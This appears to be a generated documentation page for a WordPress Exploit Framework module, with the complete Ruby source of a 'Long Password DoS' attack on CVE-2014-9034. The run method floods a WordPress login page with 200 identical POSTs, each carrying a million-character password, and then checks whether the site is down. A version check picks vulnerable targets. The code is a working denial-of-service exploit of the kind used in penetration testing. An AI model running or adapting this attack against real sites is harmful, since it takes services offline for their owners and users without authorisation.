Class: Wpxf::Auxiliary::LongPasswordDos
- Includes:
- Wpxf, Net::HttpClient, WordPress::Login, WordPress::User
- Defined in:
- lib/wpxf/modules/auxiliary/dos/long_password_dos.rb
Constant Summary
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #check ⇒ Object
-
#initialize ⇒ LongPasswordDos
constructor
A new instance of LongPasswordDos.
- #max_requests ⇒ Object
- #pass_length ⇒ Object
- #run ⇒ Object
- #should_validate_user? ⇒ Boolean
- #username ⇒ Object
Methods included from WordPress::User
#wordpress_user_exists?, #wordpress_user_profile_form_fields
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ LongPasswordDos
Returns a new instance of LongPasswordDos.
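# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 9

# Sets the module metadata (name, description, authors, references, date) and
# registers the options this class reads back through normalized_option_value
# in #pass_length, #max_requests, #username and #should_validate_user?.
#
# With the defaults below, a run amounts to 200 login requests that each carry
# a 1,000,000-character password. The description names 3.7.5, 3.8.5, 3.9.3 and
# 4.0.1 as the first releases that are not affected.
def initialize
  super

  update_info(
    name: 'Long Password DoS',
    desc: 'WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, '\
          'and 4.x before 4.0.1 allows remote attackers to cause a denial '\
          'of service via a long password that is improperly handled during '\
          'hashing.',
    author: [
      'Javier Nieto Arevalo',  # Vulnerability disclosure
      'Andres Rojas Guerrero', # Vulnerability disclosure
      'rastating'              # WPXF module
    ],
    references: [
      ['CVE', '2014-9034'],
      ['WPVDB', '7681'],
      ['URL', 'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034']
    ],
    date: 'Nov 20 2014'
  )

  # NOTE(review): the rendered listing shows a bare `([ ... ])` here, which
  # builds the option list and then discards it, leaving every option below
  # unregistered. The class page lists #register_options among the methods
  # included from Options, so the call name was presumably lost in rendering;
  # confirm against the source file.
  register_options([
    IntegerOption.new(
      name: 'pass_length',
      required: true,
      desc: 'Length of the password to use',
      default: 1_000_000
    ),
    IntegerOption.new(
      name: 'max_requests',
      required: true,
      desc: 'Max number of requests to send',
      default: 200
    ),
    IntegerOption.new(
      name: 'http_client_timeout',
      desc: 'Max wait time in seconds for HTTP responses',
      default: 5,
      required: true
    ),
    StringOption.new(
      name: 'username',
      desc: 'The username to attempt to login with',
      required: true,
      default: ''
    ),
    BooleanOption.new(
      name: 'validate_user',
      desc: 'Validate the specified username',
      required: true,
      default: true
    )
  ])
end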
Instance Method Details
#check ⇒ Object
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 81

# Classifies the target purely from the version reported by wordpress_version;
# nothing in this method sends a request that exercises the flaw.
#
# Each pair below is a half-open range: the lower bound is inclusive and the
# upper bound (the first fixed release of that branch) is exclusive.
#
# @return [Symbol] :unknown when wordpress_version returns nil, :vulnerable
#   when the version falls inside one of the ranges, :safe otherwise
def check
  detected = wordpress_version
  return :unknown if detected.nil?

  affected_bounds = [
    %w[0 3.7.5],
    %w[3.8 3.8.5],
    %w[3.9 3.9.3],
    %w[4.0 4.0.1]
  ]

  in_affected_range = affected_bounds.any? do |floor, ceiling|
    detected >= Gem::Version.new(floor) && detected < Gem::Version.new(ceiling)
  end

  in_affected_range ? :vulnerable : :safe
end
#max_requests ⇒ Object
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 73

# Reads the 'max_requests' option through normalized_option_value.
#
# @return [Object] whatever normalized_option_value yields for 'max_requests'
def max_requests
  option_key = 'max_requests'
  normalized_option_value(option_key)
end
#pass_length ⇒ Object
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 77

# Reads the 'pass_length' option through normalized_option_value.
#
# @return [Object] whatever normalized_option_value yields for 'pass_length'
def pass_length
  option_key = 'pass_length'
  normalized_option_value(option_key)
end
#run ⇒ Object
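# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 101

# Queues max_requests login POSTs that all carry the same password of
# pass_length characters, executes the queue, then reports whether
# wordpress_and_online? is still truthy.
#
# Every request is built from one shared options hash, so the traffic is a
# burst of identical, oversized login POSTs for a single username. The module
# description names 3.7.5, 3.8.5, 3.9.3 and 4.0.1 as the first unaffected
# releases.
#
# @return [Boolean] false when super is falsy, when the username check fails,
#   or when wordpress_and_online? is truthy after the requests; true otherwise
def run
  return false unless super

  if should_validate_user?
    emit_info "Checking if user \"#{username}\" exists..."
    unless wordpress_user_exists?(username)
      emit_error 'The specified user does not exist, aborting operation.'
      # This was a bare `return` (nil); every other exit path yields a boolean.
      return false
    end
  end

  emit_info 'Generating payload...'
  pass = Wpxf::Utility::Text.rand_alpha(pass_length)
  opts = {
    url: wordpress_url_login,
    method: :post,
    body: wordpress_login_post_body(username, pass)
  }

  emit_info "Preparing #{max_requests} requests..."
  complete_requests = 0
  max_requests.times do
    # The response is not inspected; the callback only counts completions and
    # reports progress on every tenth one.
    queue_request(opts) do |_res|
      complete_requests += 1
      emit_warning("#{complete_requests} requests executed") if (complete_requests % 10).zero?
    end
  end

  emit_info "Beginning execution of #{max_requests} requests over #{max_http_concurrency} threads"
  execute_queued_requests
  emit_success 'Finished executing requests'

  if wordpress_and_online?
    emit_error "FAILED: #{full_uri} appears to still be online"
    return false
  end

  emit_success "#{full_uri} appears to be down"
  true
end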
#should_validate_user? ⇒ Boolean
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 65

# Reads the 'validate_user' option through normalized_option_value; #run uses
# the result to decide whether to look the username up first.
#
# @return [Object] whatever normalized_option_value yields for 'validate_user'
def should_validate_user?
  option_key = 'validate_user'
  normalized_option_value(option_key)
end
#username ⇒ Object
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 69

# Reads the 'username' option through normalized_option_value.
#
# @return [Object] whatever normalized_option_value yields for 'username'
def username
  option_key = 'username'
  normalized_option_value(option_key)
end